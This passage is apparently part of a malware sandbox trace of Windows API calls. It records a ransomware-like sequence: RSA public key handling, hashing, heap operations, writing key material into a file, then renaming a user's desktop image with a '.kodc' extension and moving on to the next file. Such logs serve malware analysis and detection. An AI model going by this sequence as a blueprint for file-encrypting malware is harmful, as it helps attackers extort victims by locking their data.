KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.960] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.961] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.961] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.961] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.962] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.962] GetLastError () returned 0x0 [0097.962] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.962] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.962] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.962] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.962] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1090) returned 0x9b8e410 [0097.962] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0097.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33402a8 [0097.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a790 [0097.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33402f0 [0097.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7a8 [0097.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7d8 [0097.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7f0 [0097.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.963] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7d8 | out: hHeap=0x630000) returned 1 [0097.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7f0 | out: hHeap=0x630000) returned 1 [0097.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0097.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a7f0 [0097.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0097.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a7d8 [0097.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0097.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0097.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0097.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7f0 | out: hHeap=0x630000) returned 1 [0097.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7d8 | out: hHeap=0x630000) returned 1 [0097.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0097.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.964] GetCurrentThreadId () returned 0x42c [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696728 [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.965] GetCurrentThreadId () returned 0x42c [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7d8 [0097.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0097.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7f0 [0097.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7c0 [0097.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a808 [0097.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0097.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0097.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7d8 | out: hHeap=0x630000) returned 1 [0097.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7d8 [0097.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0097.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0097.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0097.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0097.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0097.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7d8 | out: hHeap=0x630000) returned 1 [0097.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0097.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0097.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a808 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7f0 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7c0 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7a8 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33402f0 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.970] WriteFile (in: hFile=0x5cc, lpBuffer=0x9b8e410*, nNumberOfBytesToWrite=0x1089, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9b8e410*, lpNumberOfBytesWritten=0x9e2fb14*=0x1089, lpOverlapped=0x0) returned 1 [0097.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8e410 | out: hHeap=0x630000) returned 1 [0097.970] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x108e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.970] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0097.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0097.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0097.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0097.970] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0097.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.971] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.971] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.971] CloseHandle (hObject=0x5cc) returned 1 [0097.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0097.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.972] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZO d wwM-wRdscY.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zo d wwm-wrdscy.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZO d wwM-wRdscY.bmp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zo d wwm-wrdscy.bmp.kodc")) returned 1 [0097.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.973] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0097.974] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x832ef110, ftCreationTime.dwHighDateTime=0x1d5c14a, ftLastAccessTime.dwLowDateTime=0x4161b80, ftLastAccessTime.dwHighDateTime=0x1d5c32d, ftLastWriteTime.dwLowDateTime=0x4161b80, ftLastWriteTime.dwHighDateTime=0x1d5c32d, nFileSizeHigh=0x0, nFileSizeLow=0x108e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZO d wwM-wRdscY.bmp", cAlternateFileName="ZODWWM~1.BMP")) returned 0 [0097.974] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0097.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0097.974] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0097.975] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.976] HeapFree (in: hHeap=0x630000, 